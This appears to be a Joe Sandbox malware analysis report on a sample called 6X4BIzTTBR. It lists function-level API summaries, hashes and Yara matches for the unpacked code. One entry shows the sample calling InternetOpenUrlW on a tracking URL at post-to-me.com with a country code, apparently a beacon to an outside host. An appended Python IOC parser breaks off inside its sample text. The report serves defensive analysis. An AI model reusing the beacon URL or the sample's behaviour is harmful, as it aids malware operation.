                                                      • Instruction Fuzzy Hash: 3B51B031A00304ABEB21DF6AD851B6BB7F4EF5C724F14566EE849D7250E739AD01CB88
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3033488037-0
                                                      • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                      • Instruction ID: 9e8cb1c851769d2d730dc6f30a3eb081331b4446ee16b3edc123c8ed33b9d615
                                                      • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                      • Instruction Fuzzy Hash: 9251B331A02604EFEB24DF29DC41B6AB7F4EF49724B148669E909D7390E732F901CB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                      • Instruction ID: fa493c7e594dd2a8188879d4ef0b4437eabdb6594d260daff420ade158477668
                                                      • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                      • Instruction Fuzzy Hash: DB41E632A00304AFCB20DF79C981A5AB7B5EF89714F15816AE516EB391DB35ED01CB85
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                      • Instruction ID: 635d86e9bff84fbc1bcee5cf9abe1ce2424f76cc9841d658fc271c55971e736a
                                                      • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                      • Instruction Fuzzy Hash: 3E41BE36A01204DFDB24DF78C880A6AB7F5EF85714B5585A9D915EB3C1EB32BA01CB80
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D10A,00000000,00000000,0042D948,?,0042D948,?,00000001,0042D10A,23E85006,00000001,0042D948,0042D948), ref: 004368FA
                                                      • __alloca_probe_16.LIBCMT ref: 00436932
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436983
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436995
                                                      • __freea.LIBCMT ref: 0043699E
                                                        • Part of subcall function 004336B7: RtlAllocateHeap.NTDLL(00000000,0040D886,00000000,?,004267AE,00000002,00000000,00000000,00000000,?,0040CD37,0040D886,00000004,00000000,00000000,00000000), ref: 004336E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                      • String ID:
                                                      • API String ID: 313313983-0
                                                      • Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                      • Instruction ID: ba5234b48696d485b191fcf70c43932052d8178864213fa56b0c51d67f083833
                                                      • Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                      • Instruction Fuzzy Hash: 2C311272A0021AABDF249F65CC85EAF7BA5EF04714F05422AFC04D7290EB39DD54CBA4
                                                      APIs
                                                      • _SpinWait.LIBCONCRT ref: 0041AEFB
                                                        • Part of subcall function 00410F31: _SpinWait.LIBCONCRT ref: 00410F49
                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF0F
                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF41
                                                      • List.LIBCMT ref: 0041AFC4
                                                      • List.LIBCMT ref: 0041AFD3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                      • String ID:
                                                      • API String ID: 3281396844-0
                                                      • Opcode ID: 5c6d79d2061d1be3f6f55815ae92c1b0f0a4dcb5fbd971ed29b9e32bad9935db
                                                      • Instruction ID: d76806ffb847d2b8795c0c1ce5cac4184fdf118ee2c1758562e02e1fb281a4c2
                                                      • Opcode Fuzzy Hash: 5c6d79d2061d1be3f6f55815ae92c1b0f0a4dcb5fbd971ed29b9e32bad9935db
                                                      • Instruction Fuzzy Hash: A4318B72902715DFCB14EFA5C6911EEB7B1BF04308F04006FE40167682DB786DA6CB9A
                                                      APIs
                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402077
                                                      • GdipAlloc.GDIPLUS(00000010), ref: 0040207F
                                                      • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040209A
                                                      • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020C4
                                                      • GdiplusShutdown.GDIPLUS(?), ref: 004020F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                      • String ID:
                                                      • API String ID: 2357751836-0
                                                      • Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                      • Instruction ID: f6703a3e164e8a40b248b3ea094e3db2a53e40250f21368f82fe8a57dbb58177
                                                      • Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                      • Instruction Fuzzy Hash: 39214FB5A0131AAFCB00DF65DD499AFFBB8FF49741B104136E906E3290D7759901CBA4
                                                      APIs
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 046D50B9
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 046D50CD
                                                        • Part of subcall function 046DBDC4: __EH_prolog3_GS.LIBCMT ref: 046DBDCB
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 046D5132
                                                      • __Getcoll.LIBCPMT ref: 046D5141
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 046D5151
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                      • String ID:
                                                      • API String ID: 1844465188-0
                                                      • Opcode ID: b3d25415ebe9df55360aa105a261caa554903da6f74474e9da843092e161a1ac
                                                      • Instruction ID: 076022f2de37cc49f6a28a941a912bf64ee308f557c8ec7b46ca9cf65b12e795
                                                      • Opcode Fuzzy Hash: b3d25415ebe9df55360aa105a261caa554903da6f74474e9da843092e161a1ac
                                                      • Instruction Fuzzy Hash: 38218E71C10308EFEB14EFA0D8447ADBBB0BF54719F10855ED486AB280FBB46944CB95
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,0042EADE,00434D8C,?,00431F18,00000001,00000364,?,0042DFF5,00457910,00000010), ref: 00431F73
                                                      • _free.LIBCMT ref: 00431FA8
                                                      • _free.LIBCMT ref: 00431FCF
                                                      • SetLastError.KERNEL32(00000000), ref: 00431FDC
                                                      • SetLastError.KERNEL32(00000000), ref: 00431FE5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                      • Instruction ID: 0bb4c41d89e8db7ac5360865ccf1e27050dc686f523c1d9b64a0834e8c50356c
                                                      • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                      • Instruction Fuzzy Hash: B101FE36149A007BC6122B756C85E2B162D9FDA77AF20213FF415923F1DB6D8906413D
                                                      APIs
                                                      • GetLastError.KERNEL32(046DDAED,046DDAED,00000002,046FED45,04703961,00000000,?,046F6A15,00000002,00000000,00000000,00000000,?,046DCF9E,046DDAED,00000004), ref: 047021DA
                                                      • _free.LIBCMT ref: 0470220F
                                                      • _free.LIBCMT ref: 04702236
                                                      • SetLastError.KERNEL32(00000000,?,046DDAED), ref: 04702243
                                                      • SetLastError.KERNEL32(00000000,?,046DDAED), ref: 0470224C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                      • Instruction ID: a691cba40893d0abed5755985c0d8ed7d88bed38c6f0bc3d55109c11a372fa71
                                                      • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                      • Instruction Fuzzy Hash: B6014E37207700F7D3116B615D4CD1A26DDAFC167A752C564F805923D2FEB1FC055025
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                      • _free.LIBCMT ref: 00431F21
                                                      • _free.LIBCMT ref: 00431F49
                                                      • SetLastError.KERNEL32(00000000), ref: 00431F56
                                                      • SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                      • Instruction ID: c5cb8133f503a8bdd3c19ec9c482994fb56af7f8014b937df2e0ecdda01c9ae0
                                                      • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                      • Instruction Fuzzy Hash: AFF0CD3A64CA0037D61637256C06B1B26199FDEB26F21112FF515D23F2EF2DC906456E
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                      • _free.LIBCMT ref: 04702188
                                                      • _free.LIBCMT ref: 047021B0
                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021BD
                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                      • Instruction ID: a258b39263a21e2dfdbfda22392acf9e559856574cbc6cbe745bd7f46edc2e40
                                                      • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                      • Instruction Fuzzy Hash: ACF0F937147600FBE3127764AC0CA1A26E99BC2B2AF618164FA14923D1FE62BD025169
                                                      APIs
                                                        • Part of subcall function 0041274D: TlsGetValue.KERNEL32(?,?,00410B6B,00412C78,00000000,?,00410B49,?,?,?,00000000,?,00000000), ref: 00412753
                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041795A
                                                        • Part of subcall function 00420FC3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FEA
                                                        • Part of subcall function 00420FC3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421003
                                                        • Part of subcall function 00420FC3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421079
                                                        • Part of subcall function 00420FC3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421081
                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417968
                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417972
                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041797C
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041799A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                      • String ID:
                                                      • API String ID: 4266703842-0
                                                      • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                      • Instruction ID: f417206a81147c4d0187a52c5393a837a907a30705d025ad54cd2b8be6e1a527
                                                      • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                      • Instruction Fuzzy Hash: 6AF04631A0022867CB15B72398129EEB7269F91724B00012FF40093293DF6C9E988BCD
                                                      APIs
                                                        • Part of subcall function 046E29B4: TlsGetValue.KERNEL32(?,?,046E0DD2,046E2EDF,00000000,?,046E0DB0,?,?,?,00000000,?,00000000), ref: 046E29BA
                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 046E7BC1
                                                        • Part of subcall function 046F122A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 046F1251
                                                        • Part of subcall function 046F122A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 046F126A
                                                        • Part of subcall function 046F122A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 046F12E0
                                                        • Part of subcall function 046F122A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 046F12E8
                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 046E7BCF
                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 046E7BD9
                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 046E7BE3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E7C01
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                      • String ID:
                                                      • API String ID: 4266703842-0
                                                      • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                      • Instruction ID: 8a7709d7e1267c49d4c340f1411ad209f6ec00b8d4e6d25339d3ee978ab52371
                                                      • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                      • Instruction Fuzzy Hash: 26F0F635A0121967EF15FB77982087DB7AA8F90A59B04416ED51053290FF24BE0587C9
                                                      APIs
                                                      • _free.LIBCMT ref: 00439E6D
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 00439E7F
                                                      • _free.LIBCMT ref: 00439E91
                                                      • _free.LIBCMT ref: 00439EA3
                                                      • _free.LIBCMT ref: 00439EB5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction ID: 3186ba135eca5673d5c7bcc8988928ed8454316b694184ab3a724b15f8ce2174
                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction Fuzzy Hash: 61F03C32409200AB9620EB59E487C1777D9AB08711F68694BF058D7761CB7AFC80865D
                                                      APIs
                                                      • _free.LIBCMT ref: 0470A0D4
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 0470A0E6
                                                      • _free.LIBCMT ref: 0470A0F8
                                                      • _free.LIBCMT ref: 0470A10A
                                                      • _free.LIBCMT ref: 0470A11C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction ID: c998cb643e68dbd6b3a8bd0f641cbebbd42dfaab9fd44e25eb391c56f89ae8ad
                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction Fuzzy Hash: A5F09032507304EB9620EB58F8C6C0A73EDAA11318F64CE05F408D7B91CB33FCA09A69
                                                      APIs
                                                      • _free.LIBCMT ref: 00431758
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 0043176A
                                                      • _free.LIBCMT ref: 0043177D
                                                      • _free.LIBCMT ref: 0043178E
                                                      • _free.LIBCMT ref: 0043179F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction ID: 454abaf14396a352ac1c390044266c6093385f19256017a4bffd640af8968fc0
                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction Fuzzy Hash: ABF03070C003109BEE227F25AD414053B60AF2D727B04626BF45697373C739D952DB8E
                                                      APIs
                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCDF
                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD10
                                                      • GetCurrentThread.KERNEL32 ref: 0041CD19
                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD2C
                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                      • String ID:
                                                      • API String ID: 2583373041-0
                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction ID: ded1bf51efecb4c55d276ac55c376d8f8d8d921828db8f30f7b8cc6bb23b8dff
                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction Fuzzy Hash: 2AF0A776200500ABC625FF26F9918F77775AFC4715340091EE54B07661CF28A9C6D76A
                                                      APIs
                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 046ECF46
                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 046ECF77
                                                      • GetCurrentThread.KERNEL32 ref: 046ECF80
                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 046ECF93
                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 046ECF9C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                      • String ID:
                                                      • API String ID: 2583373041-0
                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction ID: f70e126aae42798d0f0c7054f8d0415287b1ce2e4aa9f5cbbb5181fdf0c7311d
                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction Fuzzy Hash: BBF0A032202A00DBCB25EF22E954CBB73F6AFC4514340490EE98707694EF31B942DB65
                                                      APIs
                                                      • _free.LIBCMT ref: 047019BF
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 047019D1
                                                      • _free.LIBCMT ref: 047019E4
                                                      • _free.LIBCMT ref: 047019F5
                                                      • _free.LIBCMT ref: 04701A06
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction ID: 4c599a85cbf8920d25b8fd2d18c75adf67677f444b55ba05b981ba150356e74f
                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction Fuzzy Hash: F0F01D70C02350DB9E216F14EC844043BA0EF0A7267004266F802973B2C736E866EB8E
                                                      APIs
                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 046D2E9F
                                                        • Part of subcall function 046D1321: _wcslen.LIBCMT ref: 046D1328
                                                        • Part of subcall function 046D1321: _wcslen.LIBCMT ref: 046D1344
                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 046D30B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InternetOpen_wcslen
                                                      • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                      • API String ID: 3381584094-4083784958
                                                      • Opcode ID: a99d3caadcfa28d2e70406ca4552f7285cdcb2c2efbe6c94ee4f66f14db2afae
                                                      • Instruction ID: 8fad71961c423f548a81d78e18ec2b6c64504c1552d2a76808b63e755dd4941d
                                                      • Opcode Fuzzy Hash: a99d3caadcfa28d2e70406ca4552f7285cdcb2c2efbe6c94ee4f66f14db2afae
                                                      • Instruction Fuzzy Hash: ED513095E65344A8E320EBB0BC51B352378EF58752F10543BE524CB2F2F7A19A84875E
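Added example (mine, not part of the Joe Sandbox report or of the analysed sample): a small parser for the per-function summary blocks on this page, the `APIs`, `Memory Dump Source`, `Yara matches` and `Similarity` lines, run over four of them copied from the report above. It pulls the URL and file-path IOCs out of the String ID and API-argument fields, lists the functions that call WININET directly together with the region they were found in, and reports Opcode IDs that occur both in the image mapped at 00400000 (based on PE: true) and in the region at 046D0000 (based on PE: false, Yara matches). The function and field names are my own; the reading that a matching Opcode ID in both regions means the original code was re-mapped into the unpacked area is an interpretation, not something the report states.

```python
import re
from collections import defaultdict

# Constructed input: four entries copied from the report above, abridged to the lines used.
SAMPLE = r"""APIs
• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 046D2E9F
  • Part of subcall function 046D1321: _wcslen.LIBCMT ref: 046D1328
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 046D30B7
Memory Dump Source
• Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
Yara matches
• String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
• Opcode ID: a99d3caadcfa28d2e70406ca4552f7285cdcb2c2efbe6c94ee4f66f14db2afae
APIs
• _free.LIBCMT ref: 00439E6D
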